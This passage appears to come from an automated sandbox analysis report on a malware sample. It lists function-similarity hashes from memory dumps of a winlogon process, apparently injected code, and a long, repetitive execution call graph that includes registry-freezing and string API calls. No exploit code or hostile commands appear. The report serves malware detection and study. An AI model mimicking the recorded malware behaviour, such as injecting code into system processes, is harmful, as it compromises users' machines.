                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: AD317C32221680D6EB14DF12E8457DEB7A4FF40B9AF958026EE5E17784DF38D941C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 5158255b9f45075a47059d5597f2be23213eaa00bc29a0f5feecf0f9424b8990
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 6BD1AE32B24AC0C9E711CFA9D4402ECBBB6FB54B98F144226DE6E97B99DE34C516C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: 87d0c39c7ef690860e2d692a8e2b1ea7438f5f62204bc229bf9756ed41ae7668
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: FA014832620AD0C6E715EFA6E90418EB7A2FB88FC1F044436EE4E43729EE38C051C740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: 12399152d6f5684d12032a5c33f3ea79e7a8066ea1a4d7d76d6e965cdc9918e8
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: DD91AD327206D0C5F7609FA9D8803EDFBA6BB45B98F14412BDE2E67A95DE34C486C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: dc5de42c1dc400c54a34142e8686c4d9b9fee3a7d214c8df3c00669743a542fc
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 357190362207C2CAE7259EA6E8443EEF795FB89B84F440037DD0E53B89DE35D6458B00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 479c25fd653139756ea47a74aec904b6b413ad4f2ed2086552f17bedce541712
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: EC614632A29B84CAEB20DF65D4403DDB7A0FB49B99F144226EE4D17B98EF38D595C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 094ec712c1b288e37f31cb4837e425075fcca7128a69f700356e5ae3858f6197
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: A1612632A25B84CAEB20DF65E4403DDB7A0FB45B89F144226EE4D17B99DF38D595CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: 414b1109d79ba0e870cecf76c2af5f31b5d4bde43533dd6e83f510ec87595dfc
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 6951BD322287C2C1F664DAAAE4983EEF791FB95780F450137DE5E03B99DE39C9048B50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: dcdd8cd598e05c42887886c746ddf0c279423bf44c0c1bf9e557dc900a05699c
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 2A416072625A80C6EB209F65E4443EDF7A2FB98794F514032EE4E87794EF38C441C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: 449c3b8d4a9707330a2244a19cbde2a29dd6a88ab94e040f38e9f4c0bfe6f638
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 5F110A36224B8182EB618F25F44439DB7E5FB88B94F584226EE8D47B69DF3CC551CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 0e26cef9ba68d931c57e211af9cd086a3cc8b9350f618ba4ce6d2e1c4988f689
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 2AE08671650B84D4DF018F21E8802DC73A4EF58B64B8891339D5C06311FE38D1E9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: b226c5ef1287e80dd1a639188cd00b7be9ee93c87761d6bca3fa593d7edb1d27
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 32E04F61660B84D0DB058F22E8412D873A09F58B64F8891229D5C06311EE38D1E9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: ebbb92f6b71bc6aeecd0247755a998ea3fb1c1d57f03a5a9e81a6553625eb14e
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
• Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
APIs
Memory Dump Source
• Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
• Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
• Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
APIs
Memory Dump Source
• Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

Execution Graph

Execution Coverage: 3.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1950
Total number of Limit Nodes: 2
calls 3979->3981 3980->3979 3982 7ff7f4f215f3 3981->3982 3982->3221 3982->3222 3984 7ff7f4f21394 2 API calls 3983->3984 3985 7ff7f4f2153a 3984->3985 3986 7ff7f4f2153f 3985->3986 3987 7ff7f4f21394 2 API calls 3985->3987 3988 7ff7f4f21394 2 API calls 3986->3988 3987->3986 3989 7ff7f4f2154e 3988->3989 3990 7ff7f4f21394 2 API calls 3989->3990 3991 7ff7f4f21558 3990->3991 3992 7ff7f4f2155d 3991->3992 3993 7ff7f4f21394 2 API calls 3991->3993 3994 7ff7f4f21394 2 API calls 3992->3994 3993->3992 3995 7ff7f4f21567 3994->3995 3996 7ff7f4f2156c 3995->3996 3997 7ff7f4f21394 2 API calls 3995->3997 3998 7ff7f4f21394 2 API calls 3996->3998 3997->3996 3999 7ff7f4f21576 3998->3999 4000 7ff7f4f2157b 3999->4000 4001 7ff7f4f21394 2 API calls 3999->4001 4002 7ff7f4f21394 2 API calls 4000->4002 4001->4000 4003 7ff7f4f21585 4002->4003 4004 7ff7f4f2158a 4003->4004 4005 7ff7f4f21394 2 API calls 4003->4005 4006 7ff7f4f21394 2 API calls 4004->4006 4005->4004 4007 7ff7f4f21599 4006->4007 4008 7ff7f4f21394 2 API calls 4007->4008 4009 7ff7f4f215a3 4008->4009 4010 7ff7f4f215a8 4009->4010 4011 7ff7f4f21394 2 API calls 4009->4011 4012 7ff7f4f21394 2 API calls 4010->4012 4011->4010 4013 7ff7f4f215b7 4012->4013 4014 7ff7f4f21394 2 API calls 4013->4014 4015 7ff7f4f215c1 4014->4015 4016 7ff7f4f215c6 4015->4016 4017 7ff7f4f21394 2 API calls 4015->4017 4018 7ff7f4f21394 2 API calls 4016->4018 4017->4016 4019 7ff7f4f215d0 4018->4019 4020 7ff7f4f215d5 4019->4020 4021 7ff7f4f21394 2 API calls 4019->4021 4022 7ff7f4f21394 2 API calls 4020->4022 4021->4020 4023 7ff7f4f215df 4022->4023 4024 7ff7f4f215e4 4023->4024 4025 7ff7f4f21394 2 API calls 4023->4025 4026 7ff7f4f21394 2 API calls 4024->4026 4025->4024 4027 7ff7f4f215f3 4026->4027 4027->3245 4027->3246 4029 7ff7f4f21394 2 API calls 4028->4029 4030 7ff7f4f214b3 4029->4030 4031 7ff7f4f214b8 4030->4031 4032 7ff7f4f21394 2 API calls 4030->4032 4033 7ff7f4f21394 2 API calls 4031->4033 4032->4031 4034 7ff7f4f214c2 4033->4034 4035 7ff7f4f214c7 4034->4035 4036 
7ff7f4f21394 2 API calls 4034->4036 4037 7ff7f4f21394 2 API calls 4035->4037 4036->4035 4038 7ff7f4f214d1 4037->4038 4039 7ff7f4f214d6 4038->4039 4040 7ff7f4f21394 2 API calls 4038->4040 4041 7ff7f4f21394 2 API calls 4039->4041 4040->4039 4042 7ff7f4f214e0 4041->4042 4043 7ff7f4f214e5 4042->4043 4044 7ff7f4f21394 2 API calls 4042->4044 4045 7ff7f4f21394 2 API calls 4043->4045 4044->4043 4046 7ff7f4f214ef 4045->4046 4047 7ff7f4f214f4 4046->4047 4048 7ff7f4f21394 2 API calls 4046->4048 4049 7ff7f4f21394 2 API calls 4047->4049 4048->4047 4050 7ff7f4f214fe 4049->4050 4051 7ff7f4f21394 2 API calls 4050->4051 4052 7ff7f4f21503 4051->4052 4053 7ff7f4f21394 2 API calls 4052->4053 4054 7ff7f4f21512 4053->4054 4055 7ff7f4f21394 2 API calls 4054->4055 4056 7ff7f4f21521 4055->4056 4057 7ff7f4f21530 4056->4057 4058 7ff7f4f21394 2 API calls 4056->4058 4059 7ff7f4f21394 2 API calls 4057->4059 4058->4057 4060 7ff7f4f2153a 4059->4060 4061 7ff7f4f2153f 4060->4061 4062 7ff7f4f21394 2 API calls 4060->4062 4063 7ff7f4f21394 2 API calls 4061->4063 4062->4061 4064 7ff7f4f2154e 4063->4064 4065 7ff7f4f21394 2 API calls 4064->4065 4066 7ff7f4f21558 4065->4066 4067 7ff7f4f2155d 4066->4067 4068 7ff7f4f21394 2 API calls 4066->4068 4069 7ff7f4f21394 2 API calls 4067->4069 4068->4067 4070 7ff7f4f21567 4069->4070 4071 7ff7f4f2156c 4070->4071 4072 7ff7f4f21394 2 API calls 4070->4072 4073 7ff7f4f21394 2 API calls 4071->4073 4072->4071 4074 7ff7f4f21576 4073->4074 4075 7ff7f4f2157b 4074->4075 4076 7ff7f4f21394 2 API calls 4074->4076 4077 7ff7f4f21394 2 API calls 4075->4077 4076->4075 4078 7ff7f4f21585 4077->4078 4079 7ff7f4f2158a 4078->4079 4080 7ff7f4f21394 2 API calls 4078->4080 4081 7ff7f4f21394 2 API calls 4079->4081 4080->4079 4082 7ff7f4f21599 4081->4082 4083 7ff7f4f21394 2 API calls 4082->4083 4084 7ff7f4f215a3 4083->4084 4085 7ff7f4f215a8 4084->4085 4086 7ff7f4f21394 2 API calls 4084->4086 4087 7ff7f4f21394 2 API calls 4085->4087 4086->4085 4088 7ff7f4f215b7 4087->4088 4089 7ff7f4f21394 2 
API calls 4088->4089 4090 7ff7f4f215c1 4089->4090 4091 7ff7f4f215c6 4090->4091 4092 7ff7f4f21394 2 API calls 4090->4092 4093 7ff7f4f21394 2 API calls 4091->4093 4092->4091 4094 7ff7f4f215d0 4093->4094 4095 7ff7f4f215d5 4094->4095 4096 7ff7f4f21394 2 API calls 4094->4096 4097 7ff7f4f21394 2 API calls 4095->4097 4096->4095 4098 7ff7f4f215df 4097->4098 4099 7ff7f4f215e4 4098->4099 4100 7ff7f4f21394 2 API calls 4098->4100 4101 7ff7f4f21394 2 API calls 4099->4101 4100->4099 4102 7ff7f4f215f3 4101->4102 4102->3255 4103 7ff7f4f21440 4102->4103 4104 7ff7f4f21394 2 API calls 4103->4104 4105 7ff7f4f2144f 4104->4105 4106 7ff7f4f21394 2 API calls 4105->4106 4107 7ff7f4f21459 4106->4107 4108 7ff7f4f2145e 4107->4108 4109 7ff7f4f21394 2 API calls 4107->4109 4110 7ff7f4f21394 2 API calls 4108->4110 4109->4108 4111 7ff7f4f21468 4110->4111 4112 7ff7f4f2146d 4111->4112 4113 7ff7f4f21394 2 API calls 4111->4113 4114 7ff7f4f21394 2 API calls 4112->4114 4113->4112 4115 7ff7f4f21477 4114->4115 4116 7ff7f4f2147c 4115->4116 4117 7ff7f4f21394 2 API calls 4115->4117 4118 7ff7f4f21394 2 API calls 4116->4118 4117->4116 4119 7ff7f4f21486 4118->4119 4120 7ff7f4f2148b 4119->4120 4121 7ff7f4f21394 2 API calls 4119->4121 4122 7ff7f4f21394 2 API calls 4120->4122 4121->4120 4123 7ff7f4f21495 4122->4123 4124 7ff7f4f2149a 4123->4124 4125 7ff7f4f21394 2 API calls 4123->4125 4126 7ff7f4f21394 2 API calls 4124->4126 4125->4124 4127 7ff7f4f214a4 4126->4127 4128 7ff7f4f214a9 4127->4128 4129 7ff7f4f21394 2 API calls 4127->4129 4130 7ff7f4f21394 2 API calls 4128->4130 4129->4128 4131 7ff7f4f214b3 4130->4131 4132 7ff7f4f214b8 4131->4132 4133 7ff7f4f21394 2 API calls 4131->4133 4134 7ff7f4f21394 2 API calls 4132->4134 4133->4132 4135 7ff7f4f214c2 4134->4135 4136 7ff7f4f214c7 4135->4136 4137 7ff7f4f21394 2 API calls 4135->4137 4138 7ff7f4f21394 2 API calls 4136->4138 4137->4136 4139 7ff7f4f214d1 4138->4139 4140 7ff7f4f214d6 4139->4140 4141 7ff7f4f21394 2 API calls 4139->4141 4142 7ff7f4f21394 2 API calls 
4140->4142 4141->4140 4143 7ff7f4f214e0 4142->4143 4144 7ff7f4f214e5 4143->4144 4145 7ff7f4f21394 2 API calls 4143->4145 4146 7ff7f4f21394 2 API calls 4144->4146 4145->4144 4147 7ff7f4f214ef 4146->4147 4148 7ff7f4f214f4 4147->4148 4149 7ff7f4f21394 2 API calls 4147->4149 4150 7ff7f4f21394 2 API calls 4148->4150 4149->4148 4151 7ff7f4f214fe 4150->4151 4152 7ff7f4f21394 2 API calls 4151->4152 4153 7ff7f4f21503 4152->4153 4154 7ff7f4f21394 2 API calls 4153->4154 4155 7ff7f4f21512 4154->4155 4156 7ff7f4f21394 2 API calls 4155->4156 4157 7ff7f4f21521 4156->4157 4158 7ff7f4f21530 4157->4158 4159 7ff7f4f21394 2 API calls 4157->4159 4160 7ff7f4f21394 2 API calls 4158->4160 4159->4158 4161 7ff7f4f2153a 4160->4161 4162 7ff7f4f2153f 4161->4162 4163 7ff7f4f21394 2 API calls 4161->4163 4164 7ff7f4f21394 2 API calls 4162->4164 4163->4162 4165 7ff7f4f2154e 4164->4165 4166 7ff7f4f21394 2 API calls 4165->4166 4167 7ff7f4f21558 4166->4167 4168 7ff7f4f2155d 4167->4168 4169 7ff7f4f21394 2 API calls 4167->4169 4170 7ff7f4f21394 2 API calls 4168->4170 4169->4168 4171 7ff7f4f21567 4170->4171 4172 7ff7f4f2156c 4171->4172 4173 7ff7f4f21394 2 API calls 4171->4173 4174 7ff7f4f21394 2 API calls 4172->4174 4173->4172 4175 7ff7f4f21576 4174->4175 4176 7ff7f4f2157b 4175->4176 4177 7ff7f4f21394 2 API calls 4175->4177 4178 7ff7f4f21394 2 API calls 4176->4178 4177->4176 4179 7ff7f4f21585 4178->4179 4180 7ff7f4f2158a 4179->4180 4181 7ff7f4f21394 2 API calls 4179->4181 4182 7ff7f4f21394 2 API calls 4180->4182 4181->4180 4183 7ff7f4f21599 4182->4183 4184 7ff7f4f21394 2 API calls 4183->4184 4185 7ff7f4f215a3 4184->4185 4186 7ff7f4f215a8 4185->4186 4187 7ff7f4f21394 2 API calls 4185->4187 4188 7ff7f4f21394 2 API calls 4186->4188 4187->4186 4189 7ff7f4f215b7 4188->4189 4190 7ff7f4f21394 2 API calls 4189->4190 4191 7ff7f4f215c1 4190->4191 4192 7ff7f4f215c6 4191->4192 4193 7ff7f4f21394 2 API calls 4191->4193 4194 7ff7f4f21394 2 API calls 4192->4194 4193->4192 4195 7ff7f4f215d0 4194->4195 4196 7ff7f4f215d5 
4195->4196 4197 7ff7f4f21394 2 API calls 4195->4197 4198 7ff7f4f21394 2 API calls 4196->4198 4197->4196 4199 7ff7f4f215df 4198->4199 4200 7ff7f4f215e4 4199->4200 4201 7ff7f4f21394 2 API calls 4199->4201 4202 7ff7f4f21394 2 API calls 4200->4202 4201->4200 4203 7ff7f4f215f3 4202->4203 4203->3255 4203->3266 4205 7ff7f4f235c1 memset 4204->4205 4214 7ff7f4f233c3 4204->4214 4208 7ff7f4f235e6 4205->4208 4206 7ff7f4f2343a memset 4206->4214 4207 7ff7f4f2362b wcscpy wcscat wcslen 4209 7ff7f4f21422 2 API calls 4207->4209 4208->4207 4213 7ff7f4f23728 4209->4213 4210 7ff7f4f23493 wcscpy wcscat wcslen 4801 7ff7f4f21422 4210->4801 4212 7ff7f4f23767 4212->3274 4213->4212 4910 7ff7f4f21431 4213->4910 4214->4205 4214->4206 4214->4210 4217 7ff7f4f2145e 2 API calls 4214->4217 4219 7ff7f4f23579 4214->4219 4217->4214 4218 7ff7f4f2145e 2 API calls 4218->4212 4219->4205 4224 7ff7f4f28240 4220->4224 4222 7ff7f4f213b8 4223 7ff7f4f213c6 NtFreezeRegistry 4222->4223 4223->3324 4225 7ff7f4f2825e 4224->4225 4228 7ff7f4f2828b 4224->4228 4225->4222 4226 7ff7f4f28333 4227 7ff7f4f2834f malloc 4226->4227 4229 7ff7f4f28370 4227->4229 4228->4225 4228->4226 4229->4225 4231 7ff7f4f2266f memset 4230->4231 4231->3547 4314 7ff7f4f2155d 4232->4314 4234 7ff7f4f227f4 4235 7ff7f4f214c7 2 API calls 4234->4235 4236 7ff7f4f22816 4235->4236 4240 7ff7f4f21503 2 API calls 4236->4240 4238 7ff7f4f22785 wcsncmp 4349 7ff7f4f214e5 4238->4349 4241 7ff7f4f2283d 4240->4241 4243 7ff7f4f22847 memset 4241->4243 4242 7ff7f4f22d27 4244 7ff7f4f22877 4243->4244 4245 7ff7f4f228bc wcscpy wcscat wcslen 4244->4245 4246 7ff7f4f2291a 4245->4246 4247 7ff7f4f228ee wcslen 4245->4247 4248 7ff7f4f22967 wcslen 4246->4248 4250 7ff7f4f22985 4246->4250 4247->4246 4248->4250 4249 7ff7f4f229d9 wcslen 4251 7ff7f4f214a9 2 API calls 4249->4251 4250->4242 4250->4249 4252 7ff7f4f22a73 4251->4252 4253 7ff7f4f214a9 2 API calls 4252->4253 4254 7ff7f4f22bd2 4253->4254 4408 7ff7f4f214f4 4254->4408 4257 7ff7f4f214c7 2 API calls 4258 7ff7f4f22c99 4257->4258 
4259 7ff7f4f214c7 2 API calls 4258->4259 4260 7ff7f4f22cb1 4259->4260 4261 7ff7f4f2145e 2 API calls 4260->4261 4262 7ff7f4f22cbb 4261->4262 4263 7ff7f4f2145e 2 API calls 4262->4263 4264 7ff7f4f22cc5 4263->4264 4264->3545 4266 7ff7f4f21394 2 API calls 4265->4266 4267 7ff7f4f21521 4266->4267 4268 7ff7f4f21530 4267->4268 4269 7ff7f4f21394 2 API calls 4267->4269 4270 7ff7f4f21394 2 API calls 4268->4270 4269->4268 4271 7ff7f4f2153a 4270->4271 4272 7ff7f4f2153f 4271->4272 4273 7ff7f4f21394 2 API calls 4271->4273 4274 7ff7f4f21394 2 API calls 4272->4274 4273->4272 4275 7ff7f4f2154e 4274->4275 4276 7ff7f4f21394 2 API calls 4275->4276 4277 7ff7f4f21558 4276->4277 4278 7ff7f4f2155d 4277->4278 4279 7ff7f4f21394 2 API calls 4277->4279 4280 7ff7f4f21394 2 API calls 4278->4280 4279->4278 4281 7ff7f4f21567 4280->4281 4282 7ff7f4f2156c 4281->4282 4283 7ff7f4f21394 2 API calls 4281->4283 4284 7ff7f4f21394 2 API calls 4282->4284 4283->4282 4285 7ff7f4f21576 4284->4285 4286 7ff7f4f2157b 4285->4286 4287 7ff7f4f21394 2 API calls 4285->4287 4288 7ff7f4f21394 2 API calls 4286->4288 4287->4286 4289 7ff7f4f21585 4288->4289 4290 7ff7f4f2158a 4289->4290 4291 7ff7f4f21394 2 API calls 4289->4291 4292 7ff7f4f21394 2 API calls 4290->4292 4291->4290 4293 7ff7f4f21599 4292->4293 4294 7ff7f4f21394 2 API calls 4293->4294 4295 7ff7f4f215a3 4294->4295 4296 7ff7f4f215a8 4295->4296 4297 7ff7f4f21394 2 API calls 4295->4297 4298 7ff7f4f21394 2 API calls 4296->4298 4297->4296 4299 7ff7f4f215b7 4298->4299 4300 7ff7f4f21394 2 API calls 4299->4300 4301 7ff7f4f215c1 4300->4301 4302 7ff7f4f215c6 4301->4302 4303 7ff7f4f21394 2 API calls 4301->4303 4304 7ff7f4f21394 2 API calls 4302->4304 4303->4302 4305 7ff7f4f215d0 4304->4305 4306 7ff7f4f215d5 4305->4306 4307 7ff7f4f21394 2 API calls 4305->4307 4308 7ff7f4f21394 2 API calls 4306->4308 4307->4306 4309 7ff7f4f215df 4308->4309 4310 7ff7f4f215e4 4309->4310 4311 7ff7f4f21394 2 API calls 4309->4311 4312 7ff7f4f21394 2 API calls 4310->4312 4311->4310 4313 7ff7f4f215f3 
